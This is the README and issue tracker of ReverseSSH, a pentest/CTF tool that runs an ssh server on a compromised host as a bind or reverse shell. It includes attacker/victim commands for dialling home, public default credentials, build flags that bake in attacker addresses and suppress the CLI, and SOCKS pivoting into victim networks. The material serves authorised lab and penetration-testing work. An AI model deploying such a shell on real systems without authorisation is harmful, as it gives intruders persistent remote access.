reverse-ssh's Introduction

ReverseSSH

A statically-linked ssh server with a reverse connection feature for simple yet powerful remote access. Most useful during HackTheBox challenges, CTFs or similar.

Has been developed and was extensively used during OSCP exam preparation.

Get the latest Release

Showcase

Features

Catching a reverse shell with netcat is cool, sure, but who hasn't accidentally closed a reverse shell with a keyboard interrupt due to muscle memory? Besides their fragility, such shells are also often missing convenience features such as fully interactive access, TAB-completion or history.

Instead, you can simply deploy the lightweight (<1.5MB) ssh server reverse-ssh onto the target and get additional conveniences such as file transfer and port forwarding on top!

ReverseSSH tries to bridge the gap between initial foothold on a target and full local privilege escalation. Its main strengths are the following:

  • Fully interactive shell access (check the caveats for old Windows versions below)
  • File transfer via sftp
  • Local / remote / dynamic port forwarding
  • Can be used as bind- and reverse-shell
  • Supports Unix and Windows operating systems

Windows caveats

A fully interactive PowerShell on Windows relies on the Windows Pseudo Console (ConPTY) and thus requires at least Windows 10 build 17763. On earlier versions you still get an interactive reverse shell, but one that can't handle virtual terminal codes such as arrow keys or keyboard interrupts. In that case you have to append cmd as the command, i.e. ssh <OPTIONS> <IP> cmd.

You can achieve fully interactive shell access on older Windows versions by dropping ssh-shellhost.exe from OpenSSH for Windows into the same directory as reverse-ssh and using the flag -s ssh-shellhost.exe. All traffic is then piped through ssh-shellhost.exe, which mimics a pty and translates the virtual terminal codes into something Windows understands.

Requirements

Running the provided binaries has no dependencies beyond Go's own platform requirements.

In short:

  • Linux: kernel version 2.6.23 and higher
  • Windows: Windows Server 2008R2 and higher or Windows 7 and higher

Compiling additionally requires the following:

  • golang version 1.15
  • optionally upx for compression (e.g. apt install upx-ucl)

Usage

Once reverse-ssh is running on the victim, you can connect with any username and either the default password letmeinbrudipls, the built-in ssh key, or whatever you specified at compile time. Note that these defaults are public (they are printed in this README and by -h), so anyone who can reach the port gets a shell; for anything beyond a throwaway lab, build your own binary with RS_PASS / RS_PUB as described under Build tricks. After all, it is just an ssh server:

# Fully interactive shell access
$ ssh -p <RPORT> <RHOST>

# Simple command execution
$ ssh -p <RPORT> <RHOST> whoami

# Full-fledged file transfers
$ sftp -P <RPORT> <RHOST>

# Dynamic port forwarding as SOCKS proxy on port 9050
$ ssh -p <RPORT> -D 9050 <RHOST>

Running ReverseSSH as bind shell

# Victim
victim$ ./reverse-ssh

# Attacker (default password: letmeinbrudipls)
attacker$ ssh -p 31337 <RHOST>

Running ReverseSSH as reverse shell

Note: you can compile ReverseSSH with default values for LHOST and LPORT baked in to ease execution on the target, see below

# On attacker (get ready to catch the incoming request;
# can be omitted if you already have an ssh daemon running, e.g. OpenSSH)
# NOTE: the victim binds its reverse listener on your side at 127.0.0.1:<BPORT> (default 8888);
# an LPORT of 8888 therefore collides with it: pass `-b 8889` or similar on the victim in that case
# NOTE: consider adding -N here, so the catcher only accepts remote port forwards and nobody
# reaching <LPORT> with the well-known default credentials gets a shell on your own machine
attacker$ ./reverse-ssh -v -l -p <LPORT>

# On victim
victim$ ./reverse-ssh -p <LPORT> <LHOST>
# or in case of an ssh daemon listening at port 22 with password authentication for user 'kali'
victim$ ./reverse-ssh -p 22 kali@<LHOST>

# On attacker (default password: letmeinbrudipls)
attacker$ ssh -p 8888 127.0.0.1
# or with ssh config from below
attacker$ ssh target

In the end it's plain ssh, so you can also catch the remote port forwarding request coming from the victim's machine with your OpenSSH daemon listening on port 22. Just prepend <USER>@ and enter the password when asked; bear in mind that this means typing your attacker-side account password on the victim host. Dialling home is currently password-only, as no private key is baked in for that direction yet...

For even more convenience, add the following to your ~/.ssh/config, copy the ssh private key to ~/.ssh/ and simply call ssh target or sftp target afterwards. The last two lines turn off host-key checking for this entry, so a changed host key behind 127.0.0.1:8888 will not stop you from connecting; the price is that a substituted endpoint would go unnoticed, which is an acceptable trade for a loopback tunnel in a lab:

Host target
        Hostname 127.0.0.1
        Port 8888
        IdentityFile ~/.ssh/id_reverse-ssh
        IdentitiesOnly yes
        StrictHostKeyChecking no
        UserKnownHostsFile /dev/null

Full usage

reverseSSH v1.2.0  Copyright (C) 2021  Ferdinor <[email protected]>

Usage: reverse-ssh [options] [[<user>@]<target>]

Examples:
  Bind:
        reverse-ssh -l
        reverse-ssh -v -l -p 4444
  Reverse:
        reverse-ssh 192.168.0.1
        reverse-ssh [email protected]
        reverse-ssh -p 31337 192.168.0.1
        reverse-ssh -v -b 0 [email protected]

Options:
        -l, Start reverseSSH in listening mode (overrides reverse scenario)
        -p, Port at which reverseSSH is listening for incoming ssh connections (bind scenario)
                or where it tries to establish a ssh connection (reverse scenario) (default: 31337)
        -b, Reverse scenario only: bind to this port after dialling home (default: 8888)
        -s, Shell to spawn for incoming connections, e.g. /bin/bash; (default: /bin/bash)
                for windows this can only be used to give a path to 'ssh-shellhost.exe' to
                enhance pre-Windows10 shells (e.g. '-s ssh-shellhost.exe' if in same directory)
        -N, Deny all incoming shell/exec/subsystem and local port forwarding requests
                (if only remote port forwarding is needed, e.g. when catching reverse connections)
        -v, Emit log output

<target>
        Optional target which enables the reverse scenario. Can be prepended with
        <user>@ to authenticate as a different user other than 'reverse' while dialling home

Credentials:
        Accepting all incoming connections from any user with either of the following:
         * Password "letmeinbrudipls"
         * PubKey   "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKlbJwr+ueQ0gojy4QWr2sUWcNC/Y9eV9RdY3PLO7Bk/ Brudi"

Build instructions

Make sure to install the above requirements such as golang in a matching version and set it up correctly. Afterwards, you can compile with make, which will create static binaries in bin. Use make compressed to pack the binaries with upx to further reduce their size.

$ make

# or to additionally create binaries packed with upx
$ make compressed

Build tricks

You can also set one or more of the following environment variables when compiling to customize ReverseSSH to your use case:

  • RS_SHELL to change the default shell
  • RS_PASS to provide your own password
  • RS_PUB to provide your own authorized public key
  • LUSER to change the default username of the ssh connection attempt
  • LHOST to provide a default LHOST value and make ReverseSSH default to the reverse scenario
  • LPORT to change the default listening port, or the port an ssh connection attempt is sent to
  • BPORT to change the default listening port of reverse connections on the attacker machine; 0 means any free port is taken
  • NOCLI with any value removes all user-facing interaction (the binary ignores all supplied flags or arguments)

For example, generate a key pair and bake its public half in:

$ ssh-keygen -t ed25519 -f id_reverse-ssh

$ RS_SHELL="/bin/sh" RS_PASS="secret" RS_PUB="$(cat id_reverse-ssh.pub)" make compressed

$ LHOST="192.168.0.10" LPORT="443" BPORT="0" RS_PUB="$(cat id_reverse-ssh.pub)" make compressed

Building for different operating systems or architectures

By default, reverse-ssh is compiled for your current OS and architecture, as well as for linux and windows in x86 and x64. To compile for other architectures or another OS you can provide environmental variables which match your target, e.g. for linux/arm64:

$ GOARCH=arm64 GOOS=linux make compressed

A list of available targets in format OS/arch can be obtained via go tool dist list.

Contribute

Is a mind-blowing feature missing? Anything not working as intended?

Create an issue or pull request!


reverse-ssh's Issues

Problem to establish remote connection

Hi,
I try to establish a connection between two hosts with reverse-ssh.

  1. I need to add the -v flag to see the password prompt
  2. Authentication by password looks good
2023/04/04 20:18:03 Successful authentication with password from [email protected]:17477
2023/04/04 20:18:03 Attempt to bind at 127.0.0.1:8888 granted

But fails with

Enter password:
2023/04/04 20:18:03 ssh: tcpip-forward request denied by peer

Is it related to hosts sshd? But I tried to connect with reverse-ssh binary to a reverse-ssh listener...

Listener cmd:

./upx_reverse-sshx64 -v -l -p 8888 <IP>

Client cmd:

./upx_reverse-sshx64 -p 8888 -v <IP>

Dial Home with key file

Hi, thanks for making this awesome tool. I would like to use it as a backup ssh on a bare metal machine that has no remote management interface.

So is there any chance of implementing dial home ssh with support for a private key? Or any bash trick to read the password from a file instead? I'm thinking of starting the command at startup.

Can't use dropbear private key file

Tried to use the branch with key auth, but it doesn't work with a dropbear-generated rsa key.
The key seems to be valid with dropbear, but is unparseable for reverse-ssh?

dropbearkey -f /root/.ssh/id_dropbear -y
Public key portion is:
ssh-rsa <KEY> root@<HOST>
Fingerprint: SHA256:<FPRINT>

The ID file isn't a readable file?

Tested with an ssh-keygen generated pair and that seems to work.

But looks like binary uses the password instead of the rsa key...?

2023/04/04 20:53:42 Successful authentication with password from [email protected]:17424
2023/04/04 20:53:42 Attempt to bind at 127.0.0.1:8888 granted

The key file is read without an error. The debug lines say auth by password?
Is there an option to disable password and only use key auth?

Victim machine keep asking for password

update: So it turns out the password is printed out when I invoke the command .\reverse-ssh.exe -h (a random string).
This can be changed to a custom password in the makefile before compiling.

read from config file

please add a default config file path so that no args will need to launch the program.

Does it support cross-network operation?

I understand what reverse means: it should be used to support ssh to a target on a different network. Usually a relay server is set up and exposed to the public network, and the target machine connects to the relay server. But what confuses me in the document is: how does the victim know about the attacker's machine (server side)?

Other Architecture Builds

Maybe you could add some info to the README on how to compile it for other targets as well.
Something like:
"""
To compile for other architectures or OSs just add the desired line to the build target.
E.g. for linux/arm64:

CGO_ENABLED=0 GOARCH=arm64  GOOS=linux  go build -ldflags="$(LDFLAGS) -s -w" -o bin/reverse-ssh-arm64 .

A list of available targets can be obtained via go tool dist list.
"""

Or even allow specific target selection via environment variables or build targets.

Error in documentation ?

About the reverse shell scenario there is the following instruction in the README:

# On attacker (get ready to catch the incoming request;
# can be omitted if you already have an ssh daemon running, e.g. OpenSSH)
# NOTE: LPORT of 8888 collides with incoming connections; use the flag `-b 8889` or similar on the victim in that case
attacker$ ./reverse-ssh -v -l -p <LPORT>

As I understand it, this command is useful if I want to receive a shell from the victim without having an SSH server on my side, right?

If I try to use it:

$ ./reverse-sshx64 -v -l -p 9999
2021/12/12 15:59:06 Dialling home via ssh to 9999:22
2021/12/12 15:59:06 dial tcp: lookup 9999: no such host

It looks like it is not listening but is trying to connect to another host. Also the LPORT parameter given in the documentation seems to be used as a HOST instead.

It may be an issue in the documentation or it is not clear to me. I already used it in bind mode and it was great, nice tool :)

FeatureRequest: Add -R option for remote SOCKS connection

It would be great to get the -R option from ssh.
-R [bind_address:]port Specifies that connections to the given TCP port or Unix socket on the remote (server) host are to be forwarded to the local side. This works by allocating a socket to listen to either a TCP port or to a Unix socket on the remote side. Whenever a connection is made to this port or Unix socket, the connection is forwarded over the secure channel, and a connection is made from the local machine to either an explicit destination specified by host port hostport, or local_socket, or, if no explicit destination was specified, ssh will act as a SOCKS 4/5 proxy and forward connections to the destinations requested by the remote SOCKS client.

This would allow a reverse SOCKS connection, which can then be used from the attacker system with proxychains to reach systems in the victim network.
And as this would not be a bind shell, it might bypass firewall rules.

Way to close reverse ssh tunnel from server it's connected to

It would be awesome if there was a command I could use once done with the reverse tunnel to close/exit the remote process running the tunnel; so when I'm done with the tunnel I could exit/stop it from the server it's connected to, so that I could use the same port for multiple sessions, if that makes sense. At the moment, to disconnect/exit the connected remote process I'm having to restart the ssh server, which means I lose any other clients connected to the server. Is there any way you could implement some sort of exit command, or make an argument so that once the first sh/bash session has exited it closes the reverse tunnel and exits? Like a one-shot mode or something like that. Hoping the feature request makes sense.

Cannot set BPORT at compilation

Setting BPORT at compilation doesn't affect the final compiled binary.
When setting BPORT=0, it seems to be ignored and I have to manually use the -b 0 option to make it work

HOME not set

[rumpelsepp@alderaan bin]$ cd
bash: cd: HOME not set

I think it might be worth trying to set this variable to some default. A few things break annoyingly when $HOME is not set. The server queries information about the user for the rs-info channel anyway. So, the information about $HOME is already there.

Inconsistency in Readme / Build not working as described

Hello,

I encountered a weird issue when trying to play around with the tool, specifically when using a binary release vs. building from source.

  1. I download the reverse-sshx64 binary release.
  2. I place it on a computer on my network and start it with ./reverse-sshx64 as described.
  3. I can ssh into it from my host with ssh -p 31337 <IP> and the default password just fine.

When I clone and compile it from b5b9a0d without making any changes on go1.18.5 linux/amd64 and repeat the same steps as described in 2) and 3), I get prompted for a password just the same.

Whatever password I enter (obviously including the default one) I get a permission denied.
It seems to me I must have made a terribly stupid mistake somewhere but I really can't seem to find out where.

best regards and thanks in advance
